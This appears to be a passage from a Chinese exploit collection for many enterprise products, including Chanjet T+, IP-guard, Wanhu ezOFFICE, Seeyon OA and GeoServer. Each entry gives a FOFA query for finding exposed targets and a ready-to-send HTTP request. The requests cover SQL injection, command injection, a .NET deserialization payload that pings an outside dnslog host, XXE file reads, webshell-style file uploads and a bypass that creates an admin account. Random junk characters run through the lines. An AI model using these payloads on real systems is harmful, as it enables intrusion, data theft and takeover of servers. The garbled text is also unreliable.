Host: x.x.x.x8 M9 _( J& R$ n/ f) ~' X9 A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
1 ^7 \9 d$ ^2 [' @8 R# u. X' q* ?; oContent-Type: application/json
/ n# B( U2 p! F% M% K8 m" D5 h4 i5 S2 [2 B$ ^- T/ ~ P
{8 i& ]6 a! A7 d0 \5 R( y1 p
"storeID":{4 n) X. ?7 s5 ~
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
# T0 |, h# b" p. `% _6 I1 b "MethodName":"Start",
! I, Z1 ?1 _, B8 | i9 f3 A "ObjectInstance":{+ R, \, M2 ~4 _( W; i) U" i3 E
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",( D; n# Q8 L' q/ v5 z! L1 ?5 ^ b% y/ m$ B
"StartInfo": {: T- t/ D" | t
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
# w$ e+ n) U* o! [& W: p8 J" B "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
* P6 X1 F% k) S; ^9 d% D }! |, S3 V. @. x4 N
}
1 {! @- {! e8 c }
9 [) h, n. U' T4 `7 h& B+ D}% C, `. }% W3 C2 y/ y2 j5 E
% V0 Y/ b# a( O9 `3 v' H! V" U3 @' [# a+ P E1 a+ k
57. 畅捷通T+ keyEdit.aspx SQL注入
8 V* A8 q7 \3 ], C+ HFOFA:app="畅捷通-TPlus"9 i) n; j Z. s8 p
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
' K* t$ H; q, i/ v' I0 GHost: host6 ^+ q% U3 E* B, K4 x" k
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
) f2 T5 `5 M6 N) A* e; j* [4 b# sAccept-Charset: utf-8
- h6 B, S6 W* C3 WAccept-Encoding: gzip, deflate9 A7 N @7 X7 Q r# \. N
Connection: close! S& C1 f- l" M- a% A
7 l% T# s" j8 z2 c
3 E% a* K8 E6 u8 ]
58. 畅捷通T+ KeyInfoList.aspx sql注入5 ~; f+ v/ K' c8 q
FOFA:app="畅捷通-TPlus": O2 A$ N, K' @5 I
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1 e. z1 H* I/ C8 l2 W) I6 f
Host: your-ip
0 F4 {& w- u% bUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
8 B/ n. ]5 P1 zAccept-Charset: utf-81 o* U( E. [) z* {+ i; e& j; d
Accept-Encoding: gzip, deflate+ @/ b+ h8 b. }
Connection: close. V# {' ?; g) l u! l
$ ?* E( S! \; i/ P' B& u
* n; u5 ?% o' s
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
) C1 {) k; H- iFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
( z6 U+ u; F2 ^! L2 dPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
% E' g" t$ C$ e, IHost: 192.168.86.128:9090
. ^; `/ r5 Y TUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36* a, e, v' _+ j8 d
Connection: close) M* U; x- m }% @8 [! \
Content-Length: 16696 y! I8 U: Y2 N0 H# K# }: z
Accept: */*9 `5 {+ T% g" i- z. C* m
Accept-Language: en8 h: L0 b) D( `1 N+ }
Content-Type: application/x-www-form-urlencoded
# ~6 `# w P5 n# o$ V/ k) MAccept-Encoding: gzip1 X$ `$ m0 U! G
v% _( k, U6 }
PAYLOAD
9 Z$ |4 d* a# p& p3 Y1 X8 e+ }7 R) _+ v8 I5 ~, L K
4 b/ n5 z# F( ]8 }60. 百卓Smart管理平台 importexport.php SQL注入
/ D. C, E3 P" d( Z- VFOFA:title="Smart管理平台"; Y. x( K7 ~1 K; A, _
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
1 F' E3 x) k4 a, Z$ X CHost:
2 e+ q) c. B& X7 n0 [5 U/ W$ dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
8 g* G. f# N2 | A x+ S% G* vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! I- w- Q. L) K. |" p6 B+ G. x8 zAccept-Encoding: gzip, deflate
5 z5 g' W* h: Z1 |, v9 M; gAccept-Language: zh-CN,zh;q=0.9
6 h$ ^9 K, J' _# {& I) nConnection: close
7 ^2 c+ Z4 d" l8 I8 Z9 l6 g2 c. f# u, A% A7 R h7 ]: Y' A
& |4 Y5 O" }+ y: O61. 浙大恩特客户资源管理系统 fileupload 任意文件上传4 V" c+ {: D8 P2 R0 E
FOFA: title="欢迎使用浙大恩特客户资源管理系统"0 A: y: }* G( U
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
! q2 e5 h4 d" f1 H5 g; yHost: x.x.x.x) l5 ^; a& b- x7 f
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 M/ \' P" X) ]! f
Connection: close
# |; c0 o! b$ ~) P& i4 L( sContent-Length: 27) x. a3 R3 b. k6 J% w
Accept: */*
6 m5 ]3 F k/ D6 u: K3 _, ZAccept-Encoding: gzip, deflate- s4 L1 T/ D) ~& [) F' Q) M+ w
Accept-Language: en
5 I7 t. K0 R. r7 S' y2 \Content-Type: application/x-www-form-urlencoded
6 _0 e% @4 M) D' Z
! R8 p" ?; P6 ]( U m( M3 A8uxssX66eqrqtKObcVa0kid98xa: W1 K h' b5 ?- Z+ f! k4 M
8 M: X3 o; j7 ]0 A2 J
4 v9 o: _& t2 T. h1 f7 Z62. IP-guard WebServer 远程命令执行. J, R- @7 [$ W& }
FOFA:"IP-guard" && icon_hash="2030860561"
8 `! B) [* `5 IGET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1" R% L, j' x: I" R: {
Host: x.x.x.x
. ^& T; C1 V9 |2 x( ZUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
6 Y" f$ H( }" I: g }7 f( Z4 v- s1 k' F$ VConnection: close
; t* t. x1 x P) F: sAccept: */*
T5 X, D5 L+ W5 J8 H6 VAccept-Language: en
4 ? Q% U4 g& l" o7 `' F9 d4 [: p* IAccept-Encoding: gzip
" e5 n- Z) k& f2 ^3 ?1 P" C) J, y0 W. |' V# Q
3 A; e; {. O( p8 g! q' Z& `
访问" M9 d+ S5 z5 H) l& L4 C4 m2 m/ E! c
2 ?" O# \4 ^" v, w/ u p+ KGET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1& @" f! y$ {; k s1 L, c+ B
Host: x.x.x.x" s6 U7 T% n1 L$ q6 n8 w/ G; [
+ u( ~4 [6 |0 o$ n4 v; i
+ X% J6 U# v/ t+ B( z63. IP-guard WebServer任意文件读取
$ H# J- i* w; z7 N( D# A3 D" V, I2 n2 |IP-guard < 4.82.0609.0) f4 y6 d$ O9 {
FOFA:icon_hash="2030860561"
- P- l8 T* ?* QPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
6 e8 }% l x* T8 _Host: your-ip9 P" K# R7 X4 [8 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36; D( p, N+ V$ N- T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 `3 D6 v; z/ vAccept-Encoding: gzip, deflate
% @) ] o# b' \ B* o& ~- S+ NAccept-Language: zh-CN,zh;q=0.9% k! P$ T" w1 F- L2 G
Connection: close# [1 v% s' [$ M# n! Z, I6 L' Q
Content-Type: application/x-www-form-urlencoded
/ D9 Y* Q3 J* t b$ }/ A6 t. x
6 ^, u6 X+ Z% _" L/ a' Ipath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A% l2 D9 W! A% A. {' f0 R
4 K8 m0 [9 ^& b- h- W64. 捷诚管理信息系统CWSFinanceCommon SQL注入
) q% Z0 O8 j) a! E) NFOFA:body="/Scripts/EnjoyMsg.js"( J4 X; `) m- E: c1 A \' r Z6 d
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
; m8 Q- [2 l4 r2 ?2 \: HHost: 192.168.86.128:9001, n* @) e7 E) y& D! ]% V
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
, J& Y5 t; f6 D6 W( G8 {Connection: close- d# Q7 Y$ r' z; Q7 [- W+ ^* O6 n
Content-Length: 369
' v4 D( |0 L0 U( pAccept: */*
! Y5 l7 e& M, N7 W8 `3 yAccept-Language: en
6 o6 C% U- w1 m( |; J: O( MContent-Type: text/xml; charset=utf-89 u. v" p3 f( T+ D" Q
Accept-Encoding: gzip
; ^: ]7 J1 O- L, S) q O: Y6 k; Z1 y3 A* L
<?xml version="1.0" encoding="utf-8"?>8 Z3 I: `5 O$ n
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">1 Y) Q3 `) N/ Q: R5 U% r! o9 o
<soap:Body>+ [- k! h! r; s' v0 k2 @( v
<GetOSpById xmlns="http://tempuri.org/">% s. V |- V6 j# T8 i$ `2 g
<sId>1';waitfor delay '0:0:5'--+</sId>7 X; @2 f+ F- L2 ~! i+ m
</GetOSpById>+ t9 d( r3 M5 c) M6 n
</soap:Body>
3 ]6 L! A" x) d h0 v</soap:Envelope>7 }) |1 K5 f2 M' m \, @ S. N! y
) [' b, n. O# d& j" C9 C* P+ \
O# ^% v- o* ~ s& t4 r9 K65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
+ N; a/ W& Y+ u$ l. E8 l, BFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
. O1 L* W0 ]- z( ^- D响应200即成功创建账号test123456/123456
9 O/ b* n X5 I4 EPOST /SystemMng.ashx HTTP/1.1
& M. s+ R, i: m, n2 n; xHost:2 _! x- d' o0 u! c% i5 _$ e
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)% v. j+ g. t5 K5 @- [4 w! H+ ^' H
Accept-Encoding: gzip, deflate
$ ~( {8 `" L% ?( ]Accept: */*3 w# C u: ]* x( M% u
Connection: close" G U% r' N$ ?# t2 `' n
Accept-Language: en, v$ i; w" I+ f$ B3 w: C# {' s4 |3 h
Content-Length: 174( F1 s' U& T+ z
8 f: R9 A; K. boperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators" s( g3 y, b7 i7 k' m j ? o
) S, y5 y6 {; l1 H- d; c& f5 b( G
3 [+ g) n2 f/ U& P: o66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
5 \; Q# N! C: F$ [+ Z/ y9 SFOFA:app="万户ezOFFICE协同管理平台"
1 S: B6 w) I' v& a7 ?$ g# f! o$ q1 `+ R& L
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.11 |7 w5 u+ _' d! U, ]% F- L
Host: x.x.x.x
" f2 }9 u, m( D9 \) _) q- SUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.360 C0 c. Z# y }& t
Connection: close8 u3 X$ l7 M- r) s A% m
Accept: */*
6 w' ? o# b; o* u# h z/ EAccept-Language: en/ u4 t, d3 p8 p7 j% Y! X. T
Accept-Encoding: gzip' _7 W0 Q6 @9 g1 `
9 S4 g5 t! H3 _8 O0 P3 D! \) W
7 F7 {/ M; b) {第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在/ v. ?2 y0 Y7 {; e
9 _! G4 i% W( j, _7 M# J) q1 T% i
67. 万户ezOFFICE wpsservlet任意文件上传
& C, ^! ?9 Z. z! S5 oFOFA:app="万户网络-ezOFFICE", G# o; y! Z$ J, w# X* {- [6 C; X7 J
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型0 ?9 |$ S2 T/ z% z& I
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
5 Q1 u# |" t3 E5 w: G5 m; MHost: x.x.x.x, l+ `' Q) X i. [5 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.07 M4 r& x5 f( o+ p. ]/ p9 L O# W l
Content-Length: 1734 g9 z+ \# n7 q' f* }9 U g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8+ T \/ C, z# D7 G. C4 A, O
Accept-Encoding: gzip, deflate
4 H- Z8 k5 ^, e! V0 J- j; n. xAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
2 t) F: r' [$ k% ]5 X8 LConnection: close
' S( U; f' o4 w9 g# MContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
: U% q/ k0 P, xDNT: 1
; ]! ^+ @; w5 zUpgrade-Insecure-Requests: 1
' o8 \6 D _! ?( @6 Y! T# l& [0 s% s" j' S# t
--ufuadpxathqvxfqnuyuqaozvseiueerp
' ?; i: X+ D: m! FContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
7 F: t. V2 _9 V* [5 F' W. B k1 N# z5 x) q) `0 [$ r) ?
<% out.print("sasdfghjkj");%> [: L' P# g) w
--ufuadpxathqvxfqnuyuqaozvseiueerp-- _% k3 q |, F( S
+ G/ m7 [& a/ O9 M3 Z) F/ v$ ~
" z; ~5 e- w: U, D
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
7 X- x, O0 ]! l U2 ~) @* }! B a1 Q, f! s
68. 万户ezOFFICE wf_printnum.jsp SQL注入7 Z3 ]5 u7 ]; u* ^% |1 r* V
FOFA:app="万户ezOFFICE协同管理平台"' E5 o! e9 F& a% f2 f, u; H
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.13 [* l) S( [6 k; a6 Y, n) m
Host: {{host}}
( }( U1 n; p. A' k, sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
2 k4 L- U# N! BAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8# i: P7 ~" c4 w& p. Q
Accept-Encoding: gzip, deflate& r: L' D' B; P
Accept-Language: zh-CN,zh;q=0.9* B! l* f5 [) ]# t1 w! g4 {, L
Connection: close
7 O. e0 A1 z! o- R% {9 q3 s# y7 c2 f; i1 a2 K' q
7 e* }& t' H, l" N# K6 s2 O69. 万户 ezOFFICE contract_gd.jsp SQL注入+ P, Z, \# x3 G9 F* f; a
FOFA:app="万户ezOFFICE协同管理平台"% y6 a" x7 b; i1 W l) _
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.14 [* Z' c2 W4 G. G
Host: your-ip
1 Z' G( a" M8 R K& I) G# Z) J, {User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
5 \2 g8 n3 i4 o- p6 i' X6 v" r9 {Accept-Encoding: gzip, deflate
% N/ ?2 \9 e8 ?# D9 a0 g6 ?Accept: */*
, `5 Z3 D$ {8 M. u6 F! h0 BConnection: keep-alive" i& d8 B9 } n4 A) y$ ]9 g/ E# ^
3 \0 ^$ q2 y" m- j; ^- X9 J1 ]. s9 }5 M
70. 万户ezEIP success 命令执行
3 {5 I6 T4 P, v9 L% dFOFA:app="万户网络-ezEIP"
. e0 j4 C6 v" C: e+ g- _* V3 C3 [POST /member/success.aspx HTTP/1.19 A5 i$ x4 d8 `, X0 ?! e0 v2 z& V% q
Host: {{Hostname}}
$ |/ X% Q) C) v( J: u$ ]9 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
$ b$ V! ^9 V# j% N: u' bSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=# v9 N( a6 ]5 f) w. N
Content-Type: application/x-www-form-urlencoded
1 H# T, B( ~+ N* rTYPE: C% W3 |2 Z* k, h3 B' `; c! l2 |* C
Content-Length: 16702. Z# Z- |. @5 p9 h
i4 X3 J6 I1 n, [$ Y, q__VIEWSTATE=PAYLOAD. ?' i. N. m7 K
" s" M8 k9 w0 A, K$ S2 y
( V2 N/ Q. z4 x Y9 \0 z71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入9 E: U! k( P* l. }7 A6 P
FOFA:body="PM2项目管理系统BS版增强工具.zip"0 U! Y1 l7 N2 d5 V( {2 M, n( v
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
% q0 L. Z' N1 Y7 f/ vHost: x.x.x.xx.x.x.x
7 Q+ B* y. p6 E& }: t' N; mUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
: g- D6 z2 k1 g/ {1 J. p+ W$ WConnection: close! x1 ~% `3 {3 Q9 y7 Q9 b$ s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 B9 ~3 p, Q3 t
Accept-Encoding: gzip, deflate! K4 A& L# ~9 t" Q/ [ R6 U, O. }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. N$ o1 A' h8 M7 ]" DUpgrade-Insecure-Requests: 1) h- J* H- o$ e, o" w) ^
! E q9 B+ M& A' ~1 @, l$ Y
0 J' P# u5 I) R/ F5 G M
72. 致远OA getAjaxDataServlet XXE8 d+ Y$ p- Y B" L+ W& U7 ]: \
FOFA:app="致远互联-OA"
4 ]8 c7 R9 F) t) M, GPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
4 h/ b9 [3 h% XHost: 192.168.40.131:8099
/ c( R) n4 _$ U) I1 g+ I3 lUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.364 K* ?/ q& }4 y/ i5 j6 K
Connection: close- ]3 q/ u; c" F0 x
Content-Length: 583
F* C# d' I3 x4 t# JContent-Type: application/x-www-form-urlencoded
6 j! l: j% o* F- k0 V; x* u7 L- c; l0 TAccept-Encoding: gzip) J7 j" V1 [& v1 R6 ]6 o; S m E5 p
- _' m1 H; G# M0 q8 t( b4 I/ pS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E) w/ X* b4 t1 I/ R1 r4 ^$ l8 X
6 [9 d2 e! b; O# V
0 d1 V: C4 P, y, a0 M
73. GeoServer wms远程代码执行
1 S8 A7 |6 C0 @2 NFOFA:icon_hash=”97540678”
: X5 W; L; t% W" \' uPOST /geoserver/wms HTTP/1.1
! a0 S5 ]* C$ {! W; p5 P6 `- V% VHost:1 A6 Q% F( Z6 M! ]' h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.369 s; V) w+ i+ d) H/ D9 ~! b
Content-Length: 1981
# F+ y4 g8 \$ T. zAccept-Encoding: gzip, deflate. B, T3 o' v8 d0 F) u# f1 n
Connection: close
, W2 J2 T% L$ u3 M5 h; oContent-Type: application/xml( N, o9 x0 c' c8 ?6 a1 H
SL-CE-SUID: 37 }- ]3 H4 }: n: Y- M
( z) a' O4 T5 R+ s2 n
PAYLOAD' W$ z* I2 M) e; Y% w9 d
0 r9 z$ p1 F4 Y% N
( N9 z+ e& u, z3 M# u0 p% H, C74. 致远M3-server 6_1sp1 反序列化RCE2 R: V9 A1 C0 s `0 ]! O% k
FOFA:title="M3-Server"
) ?& b( G: G( s9 E+ d+ kPAYLOAD
. V, B6 S& l9 V" s7 P% k2 x) }+ ?/ Z# J+ `# R( f
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE- |; O1 W1 W1 S5 Z
FOFA:app="TELESQUARE-TLR-2005KSH"6 u. f- I' W, ]! ^+ ^- F( F& t
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
A+ S$ u' _5 m% R9 U% \! m1 dHost: x.x.x.x
; b5 f# i: c8 E6 e7 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ v% S8 J/ ], p0 f
Connection: close
9 h8 p9 g8 i7 C2 n+ wAccept: */*& F* W/ D# F% A- z0 w+ q
Accept-Language: en
; H* q) h# {. |0 V# F5 t5 s- [Accept-Encoding: gzip
# p) { Z" G0 L* F
7 Z* f4 W4 q6 o$ Q/ ]& |+ S) h
0 ]' n& H3 Y0 k. C2 _GET /cgi-bin/test28256.txt HTTP/1.1' ?! G) r9 E" S" A3 J7 I3 O
Host: x.x.x.x' f: ~1 S1 z& ]9 Y5 r4 p0 i+ D# i
+ ` ?- ~% W, B+ ]( N% F2 D
; W* O% a/ r9 s+ B, S+ g
76. 新开普掌上校园服务管理平台service.action远程命令执行5 p* D7 \0 B) K, v3 o2 H
FOFA:title="掌上校园服务管理平台"5 c4 g" j: T# F( y# O _
POST /service_transport/service.action HTTP/1.1
' w. M( n( t% V- L) v6 g% cHost: x.x.x.x/ W- i. q5 p1 R; S/ E+ {1 p9 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
8 l! u! ?6 G% a; \6 oConnection: close
" A. N' p. C" N' r1 {Content-Length: 2115 e) }: g2 o7 w( k% U# J3 _0 j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ D3 B) e7 I; |
Accept-Encoding: gzip, deflate
: ]9 L4 Q+ Y0 @& eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 G& W- v( U+ i `+ o
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A46 l! ?. t: S, [% u; h7 M
Upgrade-Insecure-Requests: 1
6 A0 q7 k4 g4 [" L1 T3 w* O* Y6 j
4 }- N# l* i5 \) g7 F! G! N. A{
! [$ `; ^1 q% }4 l"command": "GetFZinfo",
) y% A4 {0 i$ u "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"5 z( Q, c9 q2 D8 \/ Q/ L
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
/ C- l7 V: Q1 g7 [$ h}
5 j* G; Y$ T+ c7 j6 s3 Z
3 g- F0 g. W9 `. |" F6 D K% o0 W7 y& j F+ ^$ F
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1; K3 y% }% p* Z: F7 @. O
Host: x.x.x.x
4 ]. b; Q) j3 {# |* u
% I( r+ C1 d, ^! }3 M6 p
* ]! u& M, } T! l' O) V0 y* v: h3 [
( Q c+ D4 b% X3 V8 t4 q, V77. F22服装管理软件系统UploadHandler.ashx任意文件上传8 t6 H l' S' Z. A. X1 M# D0 I3 S
FOFA:body="F22WEB登陆"5 ^# j K& n6 I9 K: k4 o( o
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
9 @) }: X3 W& S- CHost: x.x.x.x3 M- d R* T2 O* J* V" p/ h8 u
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
2 k2 U# H! V' i7 u$ sConnection: close
, t9 P# S8 a$ h: cContent-Length: 433) I3 G0 S$ p/ y. s6 U
Accept: */*+ l& W' _/ v M$ n, P
Accept-Encoding: gzip, deflate0 M8 g6 u# u' \* J
Accept-Language: zh-CN,zh;q=0.9
8 @, H# S& X( d0 C' Z& c) z* U VContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
, L. h Y4 R8 N6 Z+ V6 p- F+ M, j# [* f" x* M6 B$ C
------------398jnjVTTlDVXHlE7yYnfwBoix
) E: d! J% {6 E- W7 c2 l, JContent-Disposition: form-data; name="folder"3 c- Y7 G, b, ] j
& H. N9 ^- z: t$ E/upload/udplog4 R3 i1 P1 h2 @/ K, ^ X0 N7 J* d h
------------398jnjVTTlDVXHlE7yYnfwBoix
: a1 F, @+ G( \! h! QContent-Disposition: form-data; name="Filedata"; filename="1.aspx"
0 Y/ J' A2 s, N9 ~Content-Type: application/octet-stream3 e* U% F% s9 z! J) B4 G, t! b
' i. g2 b/ O% [8 j+ @$ C
hello1234567
+ ~2 j4 T2 K5 k- d: Y7 d6 B; k( q------------398jnjVTTlDVXHlE7yYnfwBoix
( b$ H9 ^9 k0 B' @Content-Disposition: form-data; name="Upload"* S. J, F7 ^: z. Q0 U/ _* E7 J" J
1 l9 p& q9 o l
Submit Query
, O8 D; Y6 l: p4 F6 h------------398jnjVTTlDVXHlE7yYnfwBoix--
) U* X$ g8 `$ ]( ?. {
2 v+ \" v! `# w; L) y8 h5 F
2 R. D" @( q T# @4 \! K3 I. u78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传' S0 x3 l/ a2 S2 S# ~
FOFA:icon_hash="2001627082"# l+ Z! d# i }' q/ ?
POST /Platform/System/FileUpload.ashx HTTP/1.1, H7 |) Z2 I8 s0 v1 ]: ^( B# K
Host: x.x.x.x( e% p/ H: h3 d( `% Z. @! c3 J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 G0 x( O2 Q" o4 V6 d6 B2 L
Connection: close- `0 X- k1 w* h6 d" G% \5 F* L
Content-Length: 3360 q" J$ e% N; O
Accept-Encoding: gzip" Q2 \8 J3 o- q+ \3 b; x `0 t3 G
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l: }" I. o" G9 f. N, b
( C. X3 s( M5 `& Q0 D6 {------YsOxWxSvj1KyZow1PTsh98fdu6l
% }; I P- B ~( b/ P' Q6 OContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
1 S$ U5 Z) N$ C1 F& L2 mContent-Type: image/png
6 j* y1 y& R7 ?) `& j
